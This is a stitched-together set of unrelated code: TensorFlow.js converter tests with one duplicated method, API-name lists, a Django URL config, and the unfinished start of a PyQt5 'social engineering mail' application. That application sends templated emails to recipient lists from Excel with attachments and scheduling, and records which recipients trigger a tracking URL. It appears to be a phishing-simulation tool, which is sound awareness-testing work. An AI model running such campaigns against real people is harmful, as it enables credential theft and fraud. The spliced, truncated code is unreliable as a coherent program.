        'tensorflowjs_converter', '--input_format', 'tf_saved_model',
        '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,
        output_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    weights = [{
        'paths': ['group1-shard1of1.bin'],
        'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]
    }]
    # Load the saved weights as a JSON string.
    output_json = json.load(
        open(os.path.join(output_dir, 'model.json'), 'rt'))
    self.assertEqual(output_json['weightsManifest'], weights)

    # Check the content of the output directory.
    self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))

  def testConvertTFHubModuleWithCommandLineWorks(self):
    output_dir = os.path.join(self._tmp_dir)
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tf_hub',
        self.tf_hub_module_dir, output_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    weights = [{
        'paths': ['group1-shard1of1.bin'],
        'weights': [{
            'shape': [2],
            'name': 'module/Variable',
            'dtype': 'float32'
        }]
    }]
    # Load the saved weights as a JSON string.
    output_json = json.load(
        open(os.path.join(output_dir, 'model.json'), 'rt'))
    self.assertEqual(output_json['weightsManifest'], weights)

    # Check the content of the output directory.
    self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))

  def testConvertTFSavedModelWithCommandLineWorks(self):
    output_dir = os.path.join(self._tmp_dir)
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tf_saved_model',
        '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir,
        output_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    weights = [{
        'paths': ['group1-shard1of1.bin'],
        'weights': [{
            'dtype': 'float32',
            'shape': [],
            'name': 'StatefulPartitionedCall/mul'
        }]
    }]
    # Load the saved weights as a JSON string.
    output_json = json.load(
        open(os.path.join(output_dir, 'model.json'), 'rt'))
    weights_manifest = output_json['weightsManifest']
    self.assertEqual(len(weights_manifest), len(weights))
    if sys.version_info[0] < 3:
      self.assertItemsEqual(weights_manifest[0]['paths'],
                            weights[0]['paths'])
      self.assertItemsEqual(weights_manifest[0]['weights'],
                            weights[0]['weights'])
    else:
      self.assertCountEqual(weights_manifest[0]['paths'],
                            weights[0]['paths'])
      self.assertCountEqual(weights_manifest[0]['weights'],
                            weights[0]['weights'])

    # Check the content of the output directory.
    self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))

  def testConvertTFHubModuleWithCommandLineWorks(self):
    output_dir = os.path.join(self._tmp_dir)
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tf_hub',
        self.tf_hub_module_dir, output_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    weights = [{
        'paths': ['group1-shard1of1.bin'],
        'weights': [{
            'shape': [2],
            'name': 'module/Variable',
            'dtype': 'float32'
        }]
    }]
    # Load the saved weights as a JSON string.
    output_json = json.load(
        open(os.path.join(output_dir, 'model.json'), 'rt'))
    self.assertEqual(output_json['weightsManifest'], weights)

    # Check the content of the output directory.
    self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))

  def testConvertTensorflowjsArtifactsToKerasH5(self):
    # 1. Create a toy keras model and save it as an HDF5 file.
    os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
    h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model = _createKerasModel('MergedDenseForCLI', h5_path)
      model_json = model.to_json()

    # 2. Convert the HDF5 file to tensorflowjs format.
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'keras', h5_path,
        self._tmp_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 3. Convert the tensorflowjs artifacts back to HDF5.
    new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
        '--output_format', 'keras',
        os.path.join(self._tmp_dir, 'model.json'), new_h5_path
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 4. Load the model back from the new HDF5 file and compare with the
    # original model.
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model_2 = keras.models.load_model(new_h5_path)
      model_2_json = model_2.to_json()
      self.assertEqual(model_json, model_2_json)

  def testLoadTensorflowjsArtifactsAsKerasModel(self):
    # 1. Create a toy keras model and save it as an HDF5 file.
    os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
    h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model = _createKerasModel('MergedDenseForCLI', h5_path)
      model_json = model.to_json()

    # 2. Convert the HDF5 file to tensorflowjs format.
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'keras', h5_path,
        self._tmp_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 3. Load the tensorflowjs artifacts as a keras.Model instance.
    with tf.Graph().as_default(), tf.compat.v1.Session():
      model_2 = tfjs.converters.load_keras_model(
          os.path.join(self._tmp_dir, 'model.json'))
      model_2_json = model_2.to_json()
      self.assertEqual(model_json, model_2_json)

  def testVersion(self):
    process = subprocess.Popen(
        ['tensorflowjs_converter', '--version'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, _ = process.communicate()
    self.assertEqual(0, process.returncode)
    self.assertIn(
        tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
        tf.compat.as_bytes(stdout))

    process = subprocess.Popen(
        ['tensorflowjs_converter', '-v'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, _ = process.communicate()
    self.assertEqual(0, process.returncode)
    self.assertIn(
        tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
        tf.compat.as_bytes(stdout))


class ConvertTfKerasSavedModelTest(tf.test.TestCase):

  def setUp(self):
    super(ConvertTfKerasSavedModelTest, self).setUp()
    self._tmp_dir = tempfile.mkdtemp()

  def tearDown(self):
    if os.path.isdir(self._tmp_dir):
      shutil.rmtree(self._tmp_dir)
    super(ConvertTfKerasSavedModelTest, self).tearDown()

  def _createSimpleSequentialModel(self):
    model = keras.Sequential()
    model.add(keras.layers.Reshape([2, 3], input_shape=[6]))
    model.add(keras.layers.LSTM(10))
    model.add(keras.layers.Dense(1, activation='sigmoid'))
    return model

  def _createNestedSequentialModel(self):
    model = keras.Sequential()
    model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))
    model.add(self._createSimpleSequentialModel())
    return model

  def _createFunctionalModelWithWeights(self):
    input1 = keras.Input(shape=[8])
    input2 = keras.Input(shape=[10])
    y = keras.layers.Concatenate()([input1, input2])
    y = keras.layers.Dense(4, activation='softmax')(y)
    model = keras.Model([input1, input2], y)
    return model

  def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then save the model
      #    as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Implicit value of --output_format: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      model_json_path = os.path.join(tfjs_output_dir, 'model.json')
      self.assertTrue(os.path.isfile(model_json_path))

      # 3. Convert the tfjs model to keras h5 format.
      new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'keras', model_json_path, new_h5_path
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)
      self.assertTrue(os.path.isfile(new_h5_path))

      # 4. Load the model back and assert on the equality of the predict
      #    results.
      model_prime = keras.models.load_model(new_h5_path)
      new_y = model_prime.predict(x)
      self.assertAllClose(y, new_y)

  def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x1 = np.random.randn(4, 8)
      x2 = np.random.randn(4, 10)

      # 1. Run the model.predict(), store the result. Then save the model
      #    as a SavedModel.
      model = self._createFunctionalModelWithWeights()
      y = model.predict([x1, x2])

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Use explicit --output_format value: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          '--output_format', 'tfjs_layers_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      model_json_path = os.path.join(tfjs_output_dir, 'model.json')
      self.assertTrue(os.path.isfile(model_json_path))

      # 3. Convert the tfjs model to keras h5 format.
      new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'keras', model_json_path, new_h5_path
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)
      self.assertTrue(os.path.isfile(new_h5_path))

      # 4. Load the model back and assert on the equality of the predict
      #    results.
      model_prime = keras.models.load_model(new_h5_path)
      new_y = model_prime.predict([x1, x2])
      self.assertAllClose(y, new_y)

  def testUsingIncorrectKerasSavedModelRaisesError(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then save the model
      #    as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Use incorrect --input_format value: keras
      process = subprocess.Popen(
          [
              'tensorflowjs_converter', '--input_format', 'keras',
              self._tmp_dir, tfjs_output_dir
          ],
          stdout=subprocess.PIPE,
          stderr=subprocess.PIPE)
      _, stderr = process.communicate()
      self.assertIn(
          b'Expected path to point to an HDF5 file, '
          b'but it points to a directory',
          tf.compat.as_bytes(stderr))

  def testConvertTfjsLayersModelIntoShardedWeights(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then save the model
      #    as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)
      weights = model.get_weights()
      total_weight_bytes = sum(np.size(w) for w in weights) * 4

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs_layers_model format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Implicit value of --output_format: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 3. Convert the tfjs_layers_model to another tfjs_layers_model,
      #    with sharded weights.
      weight_shard_size_bytes = int(total_weight_bytes * 0.3)
      # Due to the shard size, there ought to be 4 shards after conversion.
      sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'tfjs_layers_model',
          '--weight_shard_size_bytes', str(weight_shard_size_bytes),
          os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 4. Check the sharded weight files and their sizes.
      weight_files = sorted(
          glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
      self.assertEqual(len(weight_files), 4)
      weight_file_sizes = [os.path.getsize(f) for f in weight_files]
      self.assertEqual(sum(weight_file_sizes), total_weight_bytes)
      self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
      self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])
      self.assertLess(weight_file_sizes[3], weight_file_sizes[0])

      # 5. Convert the sharded tfjs_layers_model back into a keras h5 file.
      new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          os.path.join(sharded_model_dir, 'model.json'), new_h5_path
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

    with tf.Graph().as_default(), tf.compat.v1.Session():
      # 6. Load the keras model and check the predict() output is close to
      #    before.
      new_model = keras.models.load_model(new_h5_path)
      new_y = new_model.predict(x)
      self.assertAllClose(new_y, y)

  def testConvertTfjsLayersModelWithQuantization(self):
    with tf.Graph().as_default(), tf.compat.v1.Session():
      x = np.random.randn(8, 10)

      # 1. Run the model.predict(), store the result. Then save the model
      #    as a SavedModel.
      model = self._createNestedSequentialModel()
      y = model.predict(x)
      weights = model.get_weights()
      total_weight_bytes = sum(np.size(w) for w in weights) * 4

      keras.experimental.export_saved_model(model, self._tmp_dir)

      # 2. Convert the keras saved model to tfjs_layers_model format.
      tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
      # Implicit value of --output_format: tfjs_layers_model
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'keras_saved_model',
          self._tmp_dir, tfjs_output_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 3. Convert the tfjs_layers_model to another tfjs_layers_model,
      #    with uint16 quantization.
      weight_shard_size_bytes = int(total_weight_bytes * 0.3)
      # Due to the shard size, there ought to be 4 shards after conversion.
      sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
      process = subprocess.Popen([
          'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
          '--output_format', 'tfjs_layers_model',
          '--quantization_bytes', '2',
          os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
      ])
      process.communicate()
      self.assertEqual(0, process.returncode)

      # 4. Check the quantized weight file and its size.
      weight_files = sorted(
          glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
      self.assertEqual(len(weight_files), 1)
      weight_file_size = os.path.getsize(weight_files[0])
      # The size of the weight file should reflect the uint16 quantization.
      self.assertEqual(weight_file_size, total_weight_bytes // 2)

  def testConvertTfjsLayersModelToTfjsGraphModel(self):
    x = np.random.randn(8, 10)

    # 1. Create a model for testing.
    model = keras.Sequential()
    model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))
    model.add(keras.layers.Dense(1, activation='sigmoid'))
    h5_path = os.path.join(self._tmp_dir, 'model.h5')
    model.save(h5_path)

    # 2. Convert the keras HDF5 model to tfjs_layers_model format.
    layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')
    # Implicit value of --output_format: tfjs_layers_model
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'keras', h5_path,
        layers_model_output_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 3. Convert the tfjs_layers_model to a tfjs_graph_model.
    graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')
    process = subprocess.Popen([
        'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
        '--output_format', 'tfjs_graph_model',
        os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir
    ])
    process.communicate()
    self.assertEqual(0, process.returncode)

    # 4. Check the model.json and weight file and its size.
    self.assertTrue(
        os.path.isfile(os.path.join(graph_model_dir, 'model.json')))
    weight_files = sorted(
        glob.glob(os.path.join(graph_model_dir, 'group*.bin')))
    self.assertEqual(len(weight_files), 1)


if __name__ == '__main__':
  tf.test.main()
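The tests above always drive the `tensorflowjs_converter` command line through `subprocess`; the same conversions can be run outside a test harness with the identical flags. The snippet below is a minimal sketch (not part of the original test file) chaining two of the conversions exercised above — Keras HDF5 to tfjs_layers_model, then tfjs_layers_model to tfjs_graph_model; the input and output paths are hypothetical placeholders.

# Minimal sketch: run the same CLI conversions the tests exercise.
# Assumes the tensorflowjs pip package (which provides the
# tensorflowjs_converter entry point) is installed; paths are placeholders.
import os
import subprocess

H5_PATH = 'model.h5'                  # hypothetical Keras HDF5 input
LAYERS_DIR = 'tfjs_layers_model_out'  # hypothetical output directories
GRAPH_DIR = 'tfjs_graph_model_out'

# Keras HDF5 -> tfjs_layers_model (the implicit default --output_format).
subprocess.run(
    ['tensorflowjs_converter', '--input_format', 'keras', H5_PATH, LAYERS_DIR],
    check=True)

# tfjs_layers_model -> tfjs_graph_model, as in
# testConvertTfjsLayersModelToTfjsGraphModel above.
subprocess.run(
    ['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
     '--output_format', 'tfjs_graph_model',
     os.path.join(LAYERS_DIR, 'model.json'), GRAPH_DIR],
    check=True)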
[ "tensorflow.python.eager.def_function.function", "tensorflow.keras.layers.Dense", "tensorflow.keras.models.load_model", "tensorflow.keras.experimental.export_saved_model", "tensorflow.compat.as_bytes", "tensorflow.python.ops.variables.Variable", "tensorflow.compat.v1.Session", "tensorflow.compat.v1.global_variables_initializer", "tensorflow.compat.v1.placeholder", "tensorflow.keras.layers.Input", "tensorflow.Graph", "tensorflow.compat.v1.saved_model.builder.SavedModelBuilder", "tensorflow.keras.layers.Reshape", "tensorflow.keras.Sequential", "tensorflow_hub.create_module_spec", "tensorflow.python.training.tracking.tracking.AutoTrackable", "tensorflow.python.saved_model.save.save", "subprocess.Popen", "tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def", "os.path.isdir", "tensorflow.keras.models.Model", "tensorflow.compat.v1.nn.softmax", "os.path.getsize", "tensorflow_hub.Module", "tensorflow.Variable", "numpy.size", "tensorflowjs.converters.save_keras_model", "os.path.isfile", "tensorflow.keras.layers.LSTM", "os.path.dirname", "tempfile.mkdtemp", "tensorflow.compat.v1.constant", "tensorflow.keras.Input", "numpy.random.randn", "tensorflow.compat.v1.name_scope", "tensorflow.compat.v1.matmul", "tensorflow.compat.v1.get_variable", "tensorflow.keras.layers.Concatenate", "os.path.join", "tensorflow.python.framework.constant_op.constant", "tensorflowjs.__version__.count", "tensorflow.test.main", "json.load", "shutil.rmtree", "tensorflow.keras.Model", "tensorflow_hub.add_signature" ]
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView

urlpatterns = [
    path('api-auth/', include('rest_framework.urls')),
    path('rest-auth/', include('rest_auth.urls')),
    path('rest-auth/registration/', include('rest_auth.registration.urls')),
    path('admin/', admin.site.urls),
    path('api/', include('core.api.urls')),
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

if not settings.DEBUG:
    urlpatterns += [re_path(r'^.*', TemplateView.as_view(template_name='index.html'))]
[ "django.conf.urls.static.static", "django.views.generic.TemplateView.as_view", "django.urls.path", "django.urls.include" ]
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

# Basic widgets are all imported from here.
from PyQt5.QtWebEngineWidgets import QWebEngineView
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout,
                             QMessageBox, QFileDialog, QLabel, QLineEdit,
                             QPushButton, QComboBox, QCheckBox, QDateTimeEdit,
                             QTextEdit, QTabWidget, QTableWidget,
                             QTableWidgetItem, QHeaderView)
from PyQt5.QtGui import QPalette, QColor, QBrush
from PyQt5.QtCore import Qt, QDateTime
from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions
import qdarkstyle, sys

import mylibrary.genmail as gm
from GenAndSendMail import insert_send_mail
from server.database import Database
from server.sendmail import Smtp
from server.client import Client
from email import generator
from pandas import DataFrame
from copy import deepcopy


class SubWindow(QWidget):
    def __init__(self):
        super().__init__()
        self.resize(400, 100)
        self.main_layout = QGridLayout()
        self.setLayout(self.main_layout)
        self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())

        self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1)
        self.in_recipient = QLineEdit()
        self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5)
        self.btn_send = QPushButton('寄送')
        self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1)


class MailserverUi(QMainWindow):
    def __init__(self):
        super().__init__()
        setConfigOption('background', '#19232D')
        setConfigOption('foreground', 'd')
        setConfigOptions(antialias=True)

        # self.resize(720,500)
        self.init_ui()
        self.data_smtp = []
        self.data_db = []
        self.data_logs = []
        self.data_temp_logs = []
        # self.sub_win = SubWindow()

        # Default status bar
        self.status = self.statusBar()
        self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: <EMAIL>")

        # Title bar
        self.setWindowTitle("社交郵件工程")
        self.setWindowOpacity(1)  # Window opacity
        self.main_layout.setSpacing(0)
        self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
        self.main_widget.setStyleSheet(
            """
            QComboBox::item:checked {
                height: 12px;
                border: 1px solid #32414B;
                margin-top: 0px;
                margin-bottom: 0px;
                padding: 4px;
                padding-left: 0px;
            }
            """
        )

    def init_ui(self):
        # Create the main window widget
        self.main_widget = QWidget()
        # Create the grid layout for the main widget
        self.main_layout = QGridLayout()
        # Use the grid layout as the main widget's layout
        self.main_widget.setLayout(self.main_layout)

        # Create the left-hand widget
        self.left_widget = QWidget()
        self.left_widget.setObjectName('left_widget')
        self.left_layout = QGridLayout()
        self.left_widget.setLayout(self.left_layout)

        # Create the right-hand widget
        self.right_widget = QWidget()
        self.right_widget.setObjectName('right_widget')
        self.right_layout = QGridLayout()
        self.right_widget.setLayout(self.right_layout)

        # Left widget at row 0, column 0, spanning 12 rows and 3 columns
        self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3)
        # Right widget at row 0, column 3, spanning 12 rows and 8 columns
        self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8)
        # Set the central widget of the window
        self.setCentralWidget(self.main_widget)

        # Main function buttons
        self.btn_sendmail = QPushButton("發送信件")
        self.btn_sendmail.clicked.connect(self.display_send_mail)
        self.btn_smtp = QPushButton("系統設定")
        self.btn_smtp.clicked.connect(self.display_smtp_setting)
        self.btn_db = QPushButton("資料庫設定")
        self.btn_db.clicked.connect(self.display_db_setting)
        self.btn_update_eml = QPushButton("修改樣板")
        self.btn_update_eml.clicked.connect(self.display_update_eml)
        self.btn_get_logs = QPushButton("觸發明細")
        self.btn_get_logs.clicked.connect(self.display_logs)
        self.btn_download_logs = QPushButton("下載觸發明細")
        self.btn_download_logs.clicked.connect(self.logs_download)
        self.quit_btn = QPushButton("退出")
        self.quit_btn.clicked.connect(self.quit_act)

        self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3)
        self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3)
        self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3)
self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3) self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3) self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3) self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3) # 主要功能查詢 self.in_data = QLineEdit() self.in_data.setPlaceholderText("暫無") self.left_layout.addWidget(self.in_data, 1, 0, 1, 3) # 主要功能 log self.query_result = QTableWidget() self.left_layout.addWidget(self.query_result, 9, 0, 2, 3) self.query_result.verticalHeader().setVisible(False) self.right_display = GraphicsLayoutWidget() self.right_layout.addWidget(self.right_display, 0, 3, 12, 8) # 右側物件: sendmail self.in_eml_type = QLineEdit() self.in_eml_template = QLineEdit() self.btn_eml_browse = QPushButton('瀏覽') self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template)) self.in_recipient_group = QLineEdit() self.in_recipient_excel = QLineEdit() self.btn_recipient_browse = QPushButton('瀏覽') self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel)) self.in_annex_file = QLineEdit() self.btn_annex_file = QPushButton('瀏覽') self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file)) self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime()) self.in_scheduler.setCalendarPopup(True) self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm') self.cb_scheduler = QCheckBox('使用') self.btn_sendmail_start = QPushButton('執行') self.btn_sendmail_start.clicked.connect(self.send_mail) # 右側物件: smtp self.in_smtp_host = QLineEdit() self.in_smtp_port = QLineEdit() self.in_smtp_user = QLineEdit() self.in_smtp_password = QLineEdit() self.cb_smtp_ssl = QCheckBox('使用') self.in_smtp_test = QLineEdit() self.btn_smtp_save = QPushButton('儲存') self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp)) self.btn_smtp_test = QPushButton('測試') self.btn_smtp_test.clicked.connect(self.show_sub_win) # 右側物件: db self.in_db_host = QLineEdit() self.in_db_port = QLineEdit() self.in_db_user = QLineEdit() self.in_db_password = QLineEdit() self.in_db_database = QLineEdit() self.in_db_domain = QLineEdit() self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址') self.btn_db_save = QPushButton('儲存') self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db)) # 右側物件: update eml self.in_edit_sender = QLineEdit() self.in_edit_sender_name = QLineEdit() self.cb_edit_annex = QCheckBox('是') self.in_edit_annex = QLineEdit() self.btn_edit_annex = QPushButton('瀏覽') self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex)) self.in_edit_subject = QLineEdit() self.mail_tab = QTabWidget() self.mail_tab.setDocumentMode(True) self.mail_tab.currentChanged.connect(self.print_html) self.mail_tab_1 = QWidget() self.mail_tab_2 = QWidget() self.mail_tab.addTab(self.mail_tab_1, 'Html') self.mail_tab.addTab(self.mail_tab_2, 'Web') self.tab_1 = QGridLayout() self.tab_2 = QGridLayout() self.tab_1.setContentsMargins(0,0,0,0) self.tab_2.setContentsMargins(0,0,0,0) self.mail_tab_1.setLayout(self.tab_1) self.mail_tab_2.setLayout(self.tab_2) self.in_edit_html = QTextEdit() self.in_edit_web = QWebEngineView() self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1) self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1) self.btn_edit_eml_reset = QPushButton('清除') self.btn_edit_eml_reset.clicked.connect(self.eml_reset) self.btn_edit_eml_read = QPushButton('讀取') self.btn_edit_eml_read.clicked.connect(self.eml_open) self.btn_edit_eml_save = QPushButton('儲存') self.btn_edit_eml_save.clicked.connect(self.eml_save) # 右側物件: logs self.tbw_logs = 
QTableWidget() self.tbw_logs.verticalHeader().setVisible(False) self.cmb_logs_choice = QComboBox() self.in_logs_data = QLineEdit() self.in_logs_data.setPlaceholderText("輸入資料") self.btn_logs_search = QPushButton('執行') self.btn_logs_search.clicked.connect(self.logs_change) def display_send_mail(self): self.clear_layout(self.right_layout) labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7) self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6) self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1) self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7) self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1) self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6) self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1) self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6) self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1) self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2) def display_smtp_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7) self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2) self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2) def display_db_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7) self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7) self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2) def display_update_eml(self): self.clear_layout(self.right_layout) labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"] for i, label in enumerate(labels): self.label = QLabel(label) self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7) 